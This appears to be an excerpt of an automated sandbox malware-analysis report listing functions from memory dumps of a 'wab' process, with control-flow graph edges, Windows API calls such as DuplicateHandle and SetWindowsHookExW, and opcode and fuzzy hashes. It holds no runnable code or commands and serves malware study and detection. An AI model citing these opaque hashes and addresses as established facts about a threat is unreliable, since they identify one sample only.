                                            • Instruction Fuzzy Hash: 085176B0D00709CFEB14EFAAD548B9EFBF1AB48304F248559E419AB350D7346945CF65
                                            Function 02FD7368 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 76 2fd7368-2fd736d 77 2fd736f-2fd7404 DuplicateHandle 76->77 78 2fd72f2-2fd72f5 76->78 79 2fd740d-2fd742a 77->79 80 2fd7406-2fd740c 77->80 80->79
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02FD73F7
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2529850348.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fd0000_wab.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 1269ddb8caf3ffa782b1d0dc6e5a589724010df903dca3b1bf5800eac0fab411
                                            • Instruction ID: 50279c0edefec9ea7cc41b5f6c8049665c38ffa13a469bcdf31315766a534d34
                                            • Opcode Fuzzy Hash: 1269ddb8caf3ffa782b1d0dc6e5a589724010df903dca3b1bf5800eac0fab411
                                            • Instruction Fuzzy Hash: 9B2107B5D00248DFDB10CFAAD584ADEFBF5EB48310F14801AEA18A7310D374A945CFA0
                                            Function 02FD7370 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 83 2fd7370-2fd7404 DuplicateHandle 84 2fd740d-2fd742a 83->84 85 2fd7406-2fd740c 83->85 85->84
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02FD73F7
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2529850348.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fd0000_wab.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 5ee2125a8005ddff2b432be8023b573f72c4dc40ad23d915c8619372a4fc165e
                                            • Instruction ID: 7f7cab4112e3e9587d0df7f221339fb92f8896b1e3b738c6f98634b5a519a180
                                            • Opcode Fuzzy Hash: 5ee2125a8005ddff2b432be8023b573f72c4dc40ad23d915c8619372a4fc165e
                                            • Instruction Fuzzy Hash: C421E0B5D002499FDB10CFAAD984ADEFBF5EB48320F14801AE918A7250C378A944CFA5
                                            Function 02FD2268 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 88 2fd2268-2fd22ba 90 2fd22bc 88->90 91 2fd22c6-2fd22f8 SetWindowsHookExW 88->91 94 2fd22c4 90->94 92 2fd22fa-2fd2300 91->92 93 2fd2301-2fd2326 91->93 92->93 94->91
                                            APIs
                                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02FD22EB
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2529850348.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fd0000_wab.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 84717f9c09f9e84efda340c4e33d372f96cd4736276a0348a769d33137998b29
                                            • Instruction ID: 6ced3f7ad71cc715c69acd3a146b58d7ed3984d8e57a9aa5f993d65c03cec4cf
                                            • Opcode Fuzzy Hash: 84717f9c09f9e84efda340c4e33d372f96cd4736276a0348a769d33137998b29
                                            • Instruction Fuzzy Hash: 0F213571D002098FDB24CFAAC944BEEBBF1FB88310F148429E819A7250CB75A941CFA0
                                            Function 02FD2270 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 98 2fd2270-2fd22ba 100 2fd22bc 98->100 101 2fd22c6-2fd22f8 SetWindowsHookExW 98->101 104 2fd22c4 100->104 102 2fd22fa-2fd2300 101->102 103 2fd2301-2fd2326 101->103 102->103 104->101
                                            APIs
                                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02FD22EB
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2529850348.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fd0000_wab.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: a4475e20744a2664f8ccf735964c61c0d0377f47855c0b993925119525af9f1f
                                            • Instruction ID: b5bd202adaaac4d6f8328fc1656322af252c02ce2adfd7fc254ac723fc6c1d5d
                                            • Opcode Fuzzy Hash: a4475e20744a2664f8ccf735964c61c0d0377f47855c0b993925119525af9f1f
                                            • Instruction Fuzzy Hash: 6C212771D002098FDB14DFAAC944BEEFBF5FB88310F148429E915A7250CB75A945CFA5
                                            Function 02F9D414 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526006454.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2f9d000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1724bbd56b61bd2de62059c39cb869da0da619e94f26a11e096a294e03ecff0
                                            • Instruction ID: 0ac36b45196f0149d458ccb23cb9a22717e9dc7ac2505cad2db0733eeb11f4e0
                                            • Opcode Fuzzy Hash: e1724bbd56b61bd2de62059c39cb869da0da619e94f26a11e096a294e03ecff0
                                            • Instruction Fuzzy Hash: 32210672A04340DFEF19EF18DAC0B16BB61FB84364F30C169DA090B256C336E456CAA2
                                            Function 02F9D500 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526006454.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2f9d000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d953a821b9e907be153e8ded00aa8df71e805aff334d7751d77fcc4ce8e54316
                                            • Instruction ID: 88af4a59662faffaa123ea559227b9f75c5c0b05661cb138837ba7ba31a3e12c
                                            • Opcode Fuzzy Hash: d953a821b9e907be153e8ded00aa8df71e805aff334d7751d77fcc4ce8e54316
                                            • Instruction Fuzzy Hash: EB21D672A04204DFEF15EF14D9C0B26BF65EB84358F34C569DA090A346C336D856CBA2
                                            Function 02FAD0FC Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526318596.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fad000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f48853ae98b9a032d3a2e5da7fa5d1945e0cd96245532adac826b8eb9a04f307
                                            • Instruction ID: d555654bb4d694d0425194482ab54715b0b1a2e35f35db4d8e103fe89a93519c
                                            • Opcode Fuzzy Hash: f48853ae98b9a032d3a2e5da7fa5d1945e0cd96245532adac826b8eb9a04f307
                                            • Instruction Fuzzy Hash: F12104F5A04304DFFB04DF10D9D4B26BBA5EB88364F20C56DDA094B656C336D846CA61
                                            Function 02FAD01C Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526318596.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fad000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 48764e146293b05baf81f98d51e5228f10d2f4a372472a393b1af5439d672da9
                                            • Instruction ID: 63d0dd1077fe5c5d5c3e6dfede50edbedc8d05e5a9189021aa1473c7e8a19d14
                                            • Opcode Fuzzy Hash: 48764e146293b05baf81f98d51e5228f10d2f4a372472a393b1af5439d672da9
                                            • Instruction Fuzzy Hash: A92146B1A04300DFDB24DF20D9D1B16BB61FB84758F20C56DDA0A4B74AC336C847CA62
                                            Function 02F9D4FB Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526006454.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2f9d000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf0eb1b2eeb3bb5a671f2db2a85db5ce2e66a2718c6931bcbb6b1d72f0437bc6
                                            • Instruction ID: b4cfc291dee6eb0462048d22f97fc735f014c58edb3342132eddf6a4b6cc5480
                                            • Opcode Fuzzy Hash: cf0eb1b2eeb3bb5a671f2db2a85db5ce2e66a2718c6931bcbb6b1d72f0437bc6
                                            • Instruction Fuzzy Hash: E211B176904244CFDF15DF10D5C4B16BF62FB84324F24C5A9D9490B256C33AD45ACBA1
                                            Function 02F9D40F Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526006454.0000000002F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2f9d000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf0eb1b2eeb3bb5a671f2db2a85db5ce2e66a2718c6931bcbb6b1d72f0437bc6
                                            • Instruction ID: 7e01d77c3452f2730965930ac8d645a44cf1279c3e53300aa014420355ed396d
                                            • Opcode Fuzzy Hash: cf0eb1b2eeb3bb5a671f2db2a85db5ce2e66a2718c6931bcbb6b1d72f0437bc6
                                            • Instruction Fuzzy Hash: 8311E176904280CFDF16DF14D6C4B16BF72FB84324F24C1A9D9090B656C33AE45ACBA1
                                            Function 02FAD0F7 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526318596.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fad000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b30322449f1078cc9a2616498228116a61b5cdb00be0f7734458abec479fa68
                                            • Instruction ID: b36217bd6b36cf9aee9b20b4bced99e7f6f1c05ff22b28d9c7f2d7145f062365
                                            • Opcode Fuzzy Hash: 3b30322449f1078cc9a2616498228116a61b5cdb00be0f7734458abec479fa68
                                            • Instruction Fuzzy Hash: 6111D0B5904240CFEB05CF10D9D4B15BF71FB48328F24C6ADD9494B656C33AD44ACB51
                                            Function 02FAD017 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2526318596.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_2fad000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae2fef9f8b228c3795c7de22666513c650991e9a697ca7df163ae87c8ff3ee4b
                                            • Instruction ID: 509ea4bb4509b3010d6352886f46ca28ec0dfa7e00765038c464e58993950c61
                                            • Opcode Fuzzy Hash: ae2fef9f8b228c3795c7de22666513c650991e9a697ca7df163ae87c8ff3ee4b
                                            • Instruction Fuzzy Hash: D911BFB5904280CFCB15CF14D6D4B15BFA1FB84718F24C6ADD9494BA56C33AD84BCB92